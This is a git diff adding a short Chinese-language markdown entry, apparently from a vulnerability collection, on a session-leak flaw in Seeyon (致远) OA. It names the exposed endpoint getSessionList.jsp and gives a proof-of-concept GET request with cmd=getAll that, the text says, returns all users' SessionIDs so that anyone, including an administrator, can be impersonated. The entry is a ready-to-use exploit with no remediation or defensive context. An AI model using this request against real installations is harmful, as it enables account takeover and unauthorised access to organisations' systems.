diff --git a/13-致远oa/致远OA Session泄漏漏洞/致远OA Session泄漏漏洞.md b/13-致远oa/致远OA Session泄漏漏洞/致远OA Session泄漏漏洞.md new file mode 100644 index 0000000..527c551 --- /dev/null +++ b/13-致远oa/致远OA Session泄漏漏洞/致远OA Session泄漏漏洞.md @@ -0,0 +1,15 @@ +# 致远OA Session泄漏漏洞 + +## 漏洞位置 +```http request +http://test.com/yyoa/ext/https/getSessionList.jsp +``` +> 当cmd参数为getAll时,便可获取到所有用户的SessionID利用泄露的SessionID即可登录该用户,包括管理员 + + +## POC +```http request +http://test.com/yyoa/ext/https/getSessionList.jsp?cmd=getAll +``` + +通过get 方式访问上述url 后,可以在返回包中看到session 信息 \ No newline at end of file